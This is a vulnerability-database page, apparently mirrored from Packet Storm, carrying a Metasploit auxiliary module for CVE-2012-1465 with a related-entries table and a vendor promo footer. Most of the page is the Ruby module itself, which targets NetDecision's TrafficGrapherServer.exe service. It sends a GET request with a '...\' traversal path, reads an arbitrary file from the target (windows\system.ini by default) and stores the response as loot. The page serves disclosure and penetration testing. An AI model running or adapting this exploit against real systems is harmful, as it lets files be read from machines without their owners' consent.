Lucene search
K

NetDecision NOCVision Server Directory Traversal

šŸ—“ļøĀ 01 Sep 2024Ā 00:00:00Reported byĀ Luigi Auriemma, sinn3r, metasploit.comTypeĀ 
packetstorm
Ā packetstorm
šŸ”—Ā packetstormsecurity.comšŸ‘Ā 157Ā Views

NetDecision NOCVision Server Directory Traversal exploi

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2012-1465
19 Mar 201219:55
–attackerkb
Circl
CVE-2012-1465
29 Feb 201200:00
–circl
CVE
CVE-2012-1465
19 Mar 201219:00
–cve
Cvelist
CVE-2012-1465
19 Mar 201219:00
–cvelist
Metasploit
NetDecision NOCVision Server Directory Traversal
14 Mar 201221:50
–metasploit
Metasploit
NetDecision 4.5.1 HTTP Server Buffer Overflow
14 Mar 201210:13
–metasploit
NVD
CVE-2012-1465
19 Mar 201219:55
–nvd
OpenVAS
NetDecision HTTP Server Long HTTP Request Remote DoS Vulnerability
8 Mar 201200:00
–openvas
Prion
Stack overflow
19 Mar 201219:55
–prion
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Auxiliary::Scanner  
include Msf::Auxiliary::Report  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'NetDecision NOCVision Server Directory Traversal',  
'Description' => %q{  
This module exploits a directory traversal bug in NetDecision's  
TrafficGrapherServer.exe service. This is done by using "...\" in  
the path to retrieve a file on a vulnerable machine.  
},  
'References' =>  
[  
[ 'CVE', '2012-1465' ],  
[ 'OSVDB', '79863' ],  
[ 'URL', 'http://aluigi.altervista.org/adv/netdecision_1-adv.txt' ],  
],  
'Author' =>  
[  
'Luigi Auriemma', #Initial discovery, poc  
'sinn3r'  
],  
'License' => MSF_LICENSE,  
'DisclosureDate' => '2012-03-07'  
))  
  
register_options(  
[  
# 8087 = TrafficGrapherServer  
# 8090 = NOCVisionServer  
Opt::RPORT(8087),  
OptString.new('FILEPATH', [false, 'The name of the file to download', 'windows\\system.ini'])  
])  
end  
  
def run_host(ip)  
trav = "...\\...\\...\\...\\...\\...\\"  
  
# In case the user doesn't realize he doesn't need to begin with "\",  
# we'll correct that for him  
file = datastore['FILEPATH']  
file = file[1,file.length] if file[0,1] == "\\"  
  
uri = "/#{trav}#{file}"  
print_status("#{ip}:#{rport} - Retrieving #{file}")  
  
res = send_request_raw({  
'method' => 'GET',  
'uri' => uri  
}, 25)  
  
if res  
print_status("#{ip}:#{rport} returns: #{res.code.to_s}")  
else  
print_error("#{ip}:#{rport} - No response")  
return  
end  
  
if res.body.empty?  
print_error("No file to download (empty)")  
else  
fname = File.basename(datastore['FILEPATH'])  
path = store_loot(  
'netdecision.http',  
'application/octet-stream',  
ip,  
res.body,  
fname)  
print_status("File saved in: #{path}")  
end  
end  
end  
`

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation